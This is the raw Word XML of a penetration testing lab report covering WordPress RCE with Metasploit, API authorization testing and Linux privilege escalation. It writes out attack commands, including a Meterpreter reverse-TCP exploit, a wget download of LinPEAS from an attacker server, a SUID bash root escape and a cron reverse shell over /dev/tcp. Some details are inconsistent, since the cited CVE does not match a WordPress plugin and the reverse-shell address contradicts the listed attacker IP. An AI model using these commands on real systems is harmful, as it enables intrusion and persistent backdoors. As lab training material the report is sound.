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35930" w14:textId="77777777" w:rsidR="0030439D" w:rsidRPr="0030439D" w:rsidRDefault="0030439D" w:rsidP="0030439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0439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Penetration Testing Lab Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D515389" w14:textId="77777777" w:rsidR="0030439D" w:rsidRDefault="0030439D" w:rsidP="0030439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F9E453E" w14:textId="77777777" w:rsidR="0030439D" w:rsidRPr="0030439D" w:rsidRDefault="0030439D" w:rsidP="0030439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3FEAB74" w14:textId="77777777" w:rsidR="0030439D" w:rsidRDefault="0030439D" w:rsidP="003043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3C99">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Project Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7121C270" w14:textId="77777777" w:rsidR="00553C99" w:rsidRPr="00553C99" w:rsidRDefault="00553C99" w:rsidP="0030439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043E35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This repository contains comprehensive documentation and procedures for a complete penetration testing engagement covering advanced exploitation, API security, privilege escalation, network attacks, mobile testing, and a full VAPT simulation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BFCCA5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641A84EB" w14:textId="77777777" w:rsidR="0030439D" w:rsidRPr="0030439D" w:rsidRDefault="0030439D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0439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lab 1: Advanced Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686A274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4B729F72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Procedure: WordPress Plugin RCE Chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075BB687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647611E9" w14:textId="6D186158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Tools Used:</w:t>
      </w:r>
      <w:r w:rsidR="004F36F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0030439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nmap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wpscan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metasploit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`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209A12AE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51CB5A6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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0158F0C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1. Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C4A2C4" w14:textId="77777777" w:rsidR="004F36F6" w:rsidRDefault="004F36F6" w:rsidP="0030439D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34000966" w14:textId="24CC6829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nmap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sV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192.168.</w:t>
      </w:r>
      <w:r w:rsidR="004F36F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004F36F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007567D3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# Port 80: WordPress detected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331CADFE" w14:textId="22A52A0C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6E4BC6C8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2. WordPress Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F715567" w14:textId="77777777" w:rsidR="004F36F6" w:rsidRDefault="004F36F6" w:rsidP="0030439D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F33A88D" w14:textId="3CABA1F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wpscan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--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http://192.168.</w:t>
      </w:r>
      <w:r w:rsidR="004F36F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004F36F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>128</w:t>
      </w:r>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> --enumerate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>p,t</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,u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--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-token [REDACTED]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD5DB34" w14:textId="250EA74D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#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0439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vulnerable plugin: WordPress Plugin v1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76471348" w14:textId="59E624A3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1FBBB69B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7F591F1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3. Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190B8E54" w14:textId="016EA0F5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B5FEA7B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msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="59B352D7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use exploit/multi/http/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wordpress_plugin_rce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4F7DDA25" w14:textId="045D1155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set RHOSTS 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="004F36F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidR="004F36F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A26A7B1" w14:textId="03C932E9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set LHOST 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="004F36F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004F36F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>139</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FBFA82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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C61277" w14:textId="6DB400E3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31BF0C6A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35F62AF8" w14:textId="77777777" w:rsidR="00207D89" w:rsidRDefault="00207D8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94C064B" w14:textId="4B131414" w:rsidR="0030439D" w:rsidRPr="0030439D" w:rsidRDefault="0030439D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0439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449A1F2C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| Exploit ID | Description | Target IP | Status | Payload |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AAB01A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|------------|-------------|-----------|--------|---------|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A32BC79" w14:textId="656A57D9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| 007 | WordPress Plugin RCE → Shell | 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="004F36F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004F36F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>128</w:t>
      </w:r>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Success | `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php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meterpreter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reverse_tcp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` |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27753E6F" w14:textId="77777777" w:rsid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5DBA1FD5" w14:textId="5D3E3DE4" w:rsidR="004F36F6" w:rsidRDefault="004F36F6" w:rsidP="0030439D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F36F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7D94558" wp14:editId="626966BF">
            <wp:extent cx="5733415" cy="2736850"/>
            <wp:effectExtent l="0" t="0" r="635" b="6350"/>
            <wp:docPr id="164626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2614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E8F2" w14:textId="77777777" w:rsidR="004F36F6" w:rsidRDefault="004F36F6" w:rsidP="0030439D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="781434BB" w14:textId="39ECE8A3" w:rsidR="004F36F6" w:rsidRPr="0030439D" w:rsidRDefault="004F36F6" w:rsidP="0030439D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F36F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0A59473" wp14:editId="303CE81F">
            <wp:extent cx="5733415" cy="2752725"/>
            <wp:effectExtent l="0" t="0" r="635" b="9525"/>
            <wp:docPr id="871969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9699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48DF6" w14:textId="77777777" w:rsidR="004F36F6" w:rsidRDefault="004F36F6" w:rsidP="0030439D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57E8DEF2" w14:textId="24DC6111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Key Findings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBDD3B7" w14:textId="6879D424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- Successfully exploited CVE-20</w:t>
      </w:r>
      <w:r w:rsidR="004F36F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-1</w:t>
      </w:r>
      <w:r w:rsidR="004F36F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6759</w:t>
      </w:r>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in WordPress Plugin v1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6FD93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- Gained initial access via Meterpreter shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EDD71F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- Extracted user credentials and database information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4462918F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13259BF2" w14:textId="77777777" w:rsidR="004F36F6" w:rsidRPr="0030439D" w:rsidRDefault="004F36F6" w:rsidP="0030439D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77F0D6FD" w14:textId="77777777" w:rsidR="0030439D" w:rsidRPr="0030439D" w:rsidRDefault="0030439D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0439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Lab 2: API Security Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D74ABDB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2FF1EBD1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Procedure: DVWA API Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF0831F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1BE32012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Tools Used: `Burp Suite`, `Postman`, `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sqlmap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`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735203EA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2C6D1CBF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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F4A539" w14:textId="2F0417D5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1. Endpoint Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747373B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Manual browsing with Burp Proxy enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2C1991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Identified `/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/v1/users/{id}` endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DD858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57593CB3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2. BOLA Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157A8E00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Intercepted request to `/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/v1/users/123`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A649DA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Modified user ID to `124` in Burp Repeater</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6BFE59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Successfully accessed unauthorized user data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1909611E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17DF8C00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Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760A9624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-Sent introspection query to `/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`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2EE17C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Discovered full schema exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148D1603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48AE968E" w14:textId="3DA575E6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Pr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PI Security Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD2A917" w14:textId="77777777" w:rsid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Testing revealed critical authorization flaws allowing horizontal privilege escalation.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endpoints exposed sensitive schema information. Input validation was insufficient across multiple endpoints, requiring immediate remediation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF5B74A" w14:textId="0D1B782D" w:rsidR="0030439D" w:rsidRDefault="000538F9" w:rsidP="0030439D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000538F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1DE1450" wp14:editId="245A826A">
            <wp:extent cx="5733415" cy="3011805"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="123759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927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5756" w14:textId="77777777" w:rsidR="000538F9" w:rsidRDefault="000538F9" w:rsidP="0030439D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70E93741" w14:textId="4AE32DA6" w:rsidR="0030439D" w:rsidRPr="0030439D" w:rsidRDefault="000538F9" w:rsidP="0030439D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000538F9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85B1BFD" wp14:editId="430A70F6">
            <wp:extent cx="5733415" cy="2739390"/>
            <wp:effectExtent l="0" t="0" r="635" b="3810"/>
            <wp:docPr id="174663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356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5CAC2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57E04253" w14:textId="5B4B9679" w:rsidR="0030439D" w:rsidRPr="0030439D" w:rsidRDefault="0030439D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0439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lab 3: Privilege Escalation &amp; Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515D5FCA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13CEEABE" w14:textId="1E181259" w:rsid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Procedure: Linux Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24978457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04103ACB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Tools Used: `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LinPEAS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`, `Meterpreter`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAC20F5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4F796571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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F35856D" w14:textId="025DBE53" w:rsid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1. Transfer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LinPEAS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7FDD683B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6D46480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# On attacker machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C46FC48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python3 -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A491CD1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# On target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E33C6B" w14:textId="414E393F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wget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http://192.168.</w:t>
      </w:r>
      <w:r w:rsidR="003E7869">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003E7869">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>128</w:t>
      </w:r>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:8000/linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75919B13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chmod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+x linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF72FAC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./linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6BC01C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32B5A07B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2. SUID Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDA4BE6" w14:textId="5365D3B2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5D9E9FC1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#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LinPEAS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identified vulnerable SUID binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296389DA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find / -perm -u=s -type f 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E702F23" w14:textId="2E57C05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0439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>./find .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -exec /bin/bash -p \;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CD4ACC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01CDAD47" w14:textId="77777777" w:rsidR="003E7869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3. Persistence Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718EA9ED" w14:textId="3398A3B9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crontab -e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0919D081" w14:textId="32BB6ACB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# Add: */5 * * * * /bin/bash -c 'bash -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&gt;&amp; /dev/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tcp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/192.168.</w:t>
      </w:r>
      <w:r w:rsidR="003E7869">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003E7869">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>128</w:t>
      </w:r>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/4445 0&gt;&amp;1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D2A986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3FE83649" w14:textId="77777777" w:rsidR="003E7869" w:rsidRDefault="003E7869" w:rsidP="0030439D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64BE3EFD" w14:textId="4A7D31B1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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71834A6C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| Task ID | Technique | Target IP | Status | Outcome |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CAFB42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|---------|-----------|-----------|--------|---------|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A15EDB8" w14:textId="194543E4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| 010 | SUID Binary Exploit | 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="004F36F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">28 </w:t>
      </w:r>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004F36F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>128</w:t>
      </w:r>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> | Success | Root Shell |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064D5E0D" w14:textId="77777777" w:rsid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10ED609C" w14:textId="6A2FA0CD" w:rsidR="00F023DE" w:rsidRDefault="00F023DE" w:rsidP="0030439D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F023D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038C079" wp14:editId="6AAB2E62">
            <wp:extent cx="5733415" cy="1224280"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="180027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2719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2870" w14:textId="77777777" w:rsidR="00F023DE" w:rsidRDefault="00F023DE" w:rsidP="0030439D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6262DB97" w14:textId="16FFFF27" w:rsidR="00F023DE" w:rsidRDefault="00F023DE" w:rsidP="0030439D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F023D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5EC4040" wp14:editId="0D960AFA">
            <wp:extent cx="5733415" cy="3330575"/>
            <wp:effectExtent l="0" t="0" r="635" b="3175"/>
